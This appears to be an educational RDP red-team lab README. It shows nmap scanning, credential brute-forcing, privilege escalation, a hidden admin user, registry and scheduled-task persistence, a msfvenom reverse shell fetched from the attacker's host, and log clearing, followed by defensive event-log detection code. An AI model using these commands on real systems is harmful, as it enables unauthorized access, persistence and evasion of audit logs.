ne4tron/RDP-bruteforce-attack-on-windows

simulate how an attacker could gain unauthorized access to a Windows machine via Remote Desktop Protocol (RDP) by brute-forcing weak credentials using RDP red team lab
Advanced RDP Red Teaming Lab

Disclaimer

This project is for educational purposes only. All activities were conducted in a safe, isolated lab environment using virtual machines I own. Do not attempt this on any system you do not have explicit permission to test.


Table of Contents

Objective

Lab Setup

Recon & Scanning

RDP Brute-Force

Python Script

Access & Post-Exploitation

Privilege Escalation

Persistence

Backdoor Shell

Lateral Movement

Clean-Up

Reporting


Objective

Simulate a real-world red team operation by brute-forcing weak RDP credentials, then performing post-exploitation, persistence, and potential lateral movement on the compromised host.


Lab Setup

-Attacker: Kali Linux

 tools: hydra, nmap, xfreerdp, python

-Victim: Windows 10

 tools: RDP enabled, weak password

-Network: host-only, isolated, no internet.


Recon & Scanning

Scan RDP port with Nmap:

nmap -p 3389 <target_ip>


RDP Brute-Force

Use the Python script in the code section to automate the password guessing; it runs the attempts faster than trying them by hand.

Run with:

python3 rdp_bruteforce.py


Access & Post-Exploitation

xfreerdp /u:Administrator /p: /v:<target_ip> /cert:ignore

Inside RDP Session:

whoami

hostname

ipconfig /all

systeminfo

dir /s /b C:\Users\*.txt


Privilege Escalation

Check permissions:

whoami /groups

Run winPEAS/SharpUp to enumerate local privilege-escalation candidates (upload the binaries over the RDP session).

winPEAS.exe quiet cmd fast

Look for:

AlwaysInstallElevated

Unquoted service paths

Weak service permissions


Persistence

Add hidden admin user:

net user sysadmin P@ssw0rd123 /add

net localgroup administrators sysadmin /add

Registry-based persistence:

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v updater /t REG_SZ /d "C:\rev.exe"

Scheduled Task:

schtasks /create /tn "Updater" /tr "C:\rev.exe" /sc onlogon


Backdoor Shell

Generate backdoor:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=<kali_ip> LPORT=4444 -f exe -o rev.exe

python3 -m http.server 80

Download in RDP:

powershell -c "Invoke-WebRequest -Uri http://<kali_ip>/rev.exe -OutFile C:\rev.exe"

Execute & catch:

nc -lvnp 4444


Lateral Movement

net view /domain

net view \

Reuse dumped credentials to access other machines if available.


Clean-Up

Clear logs (not recommended unless simulating attacker evasion):

wevtutil cl Security

wevtutil cl System

Delete backdoors, users, and payloads.


Reporting

Document:

Entry vector

Credentials cracked

Privilege escalation method

Persistence mechanism

Tools/scripts used

Detection logs

Mitigation recommendations
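The "Detection logs" item above, together with the Persistence and Clean-Up steps, is what a blue team would actually look for after a lab run like this. The following script is an added example (not part of this repository) that applies simple detection rules to Windows Security log records: a burst of failed logons (Event ID 4625) from one source, a successful RDP logon (4624, LogonType 10) from the same source right after the burst, a user created (4720) and then added to Administrators (4732), a scheduled task created (4698), and the audit log being cleared (1102). The event records are constructed to resemble Security log EventData fields, not a real capture; the threshold and time windows are assumptions to tune per environment.

```python
"""Detection rules for the traces this RDP lab leaves in the Windows Security log.

Added example; not code from the repository. EVENTS is a constructed sample
shaped like Security log records, not a real capture. Field names follow the
EventData names the Security log uses (IpAddress, TargetUserName, LogonType,
MemberName, SubjectUserName, TaskName)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample. 4625 failures from an NLA-protected RDP endpoint are
# recorded with LogonType 3; a successful interactive RDP session is 4624 with
# LogonType 10. The last record is a lone typo from another host (benign).
EVENTS = [
    {"time": "2024-01-01T10:00:00", "id": 4625, "IpAddress": "192.168.56.10", "TargetUserName": "Administrator", "LogonType": 3},
    {"time": "2024-01-01T10:00:01", "id": 4625, "IpAddress": "192.168.56.10", "TargetUserName": "Administrator", "LogonType": 3},
    {"time": "2024-01-01T10:00:02", "id": 4625, "IpAddress": "192.168.56.10", "TargetUserName": "Administrator", "LogonType": 3},
    {"time": "2024-01-01T10:00:03", "id": 4625, "IpAddress": "192.168.56.10", "TargetUserName": "Administrator", "LogonType": 3},
    {"time": "2024-01-01T10:00:04", "id": 4625, "IpAddress": "192.168.56.10", "TargetUserName": "Administrator", "LogonType": 3},
    {"time": "2024-01-01T10:00:06", "id": 4624, "IpAddress": "192.168.56.10", "TargetUserName": "Administrator", "LogonType": 10},
    {"time": "2024-01-01T10:05:00", "id": 4720, "TargetUserName": "sysadmin", "SubjectUserName": "Administrator"},
    {"time": "2024-01-01T10:05:01", "id": 4732, "TargetUserName": "Administrators", "MemberName": "sysadmin", "SubjectUserName": "Administrator"},
    {"time": "2024-01-01T10:07:00", "id": 4698, "TaskName": "\\Updater", "SubjectUserName": "Administrator"},
    {"time": "2024-01-01T10:30:00", "id": 1102, "SubjectUserName": "Administrator"},
    {"time": "2024-01-01T11:00:00", "id": 4625, "IpAddress": "192.168.56.20", "TargetUserName": "alice", "LogonType": 3},
]


def _ts(event):
    return datetime.fromisoformat(event["time"])


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=1)):
    """Sliding window per source IP: `threshold` or more 4625 records within
    `window` raises an alert. A later 4624/LogonType 10 from the same source
    upgrades it, since that is the 'guess succeeded' signal. Threshold and
    window are assumed values, not recommendations from the README."""
    alerts = {}
    recent = defaultdict(deque)  # source IP -> timestamps of recent failures
    for e in sorted(events, key=_ts):
        ip = e.get("IpAddress")
        if e["id"] == 4625:
            q = recent[ip]
            q.append(_ts(e))
            while q and _ts(e) - q[0] > window:  # drop failures outside the window
                q.popleft()
            if len(q) >= threshold:
                a = alerts.setdefault(ip, {"rule": "rdp_bruteforce", "source": ip,
                                           "first_failure": q[0].isoformat(),
                                           "failures": 0, "logged_in_as": None})
                a["failures"] = max(a["failures"], len(q))
        elif e["id"] == 4624 and e.get("LogonType") == 10 and ip in alerts:
            alerts[ip]["rule"] = "rdp_bruteforce_success"
            alerts[ip]["logged_in_as"] = e["TargetUserName"]
    return list(alerts.values())


def detect_persistence(events, window=timedelta(minutes=10)):
    """Post-access traces: a 4720 followed within `window` by a 4732 into
    Administrators matches the 'hidden admin user' step; every 4698 is surfaced
    so the task action can be reviewed; 1102 means someone ran a log clear."""
    alerts = []
    created = {}  # username -> creation time
    for e in sorted(events, key=_ts):
        if e["id"] == 4720:
            created[e["TargetUserName"]] = _ts(e)
        elif e["id"] == 4732 and e["TargetUserName"] == "Administrators":
            member = e["MemberName"]
            if member in created and _ts(e) - created[member] <= window:
                alerts.append({"rule": "new_local_admin", "user": member, "by": e["SubjectUserName"]})
        elif e["id"] == 4698:
            alerts.append({"rule": "scheduled_task_created", "task": e["TaskName"], "by": e["SubjectUserName"]})
        elif e["id"] == 1102:
            alerts.append({"rule": "audit_log_cleared", "by": e["SubjectUserName"]})
    return alerts


def run_detections(events):
    """All alerts for one batch of records."""
    return detect_bruteforce(events) + detect_persistence(events)


if __name__ == "__main__":
    for alert in run_detections(EVENTS):
        print(alert)
```

Two design points worth noting: the brute-force rule keys on source IP rather than target account, so it also catches a spray across many usernames, and the 1102 rule fires on the very action the Clean-Up section describes, which is why clearing logs tends to draw more attention than leaving them alone. Forwarding Security events to a collector before an attacker can clear them is the matching mitigation.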
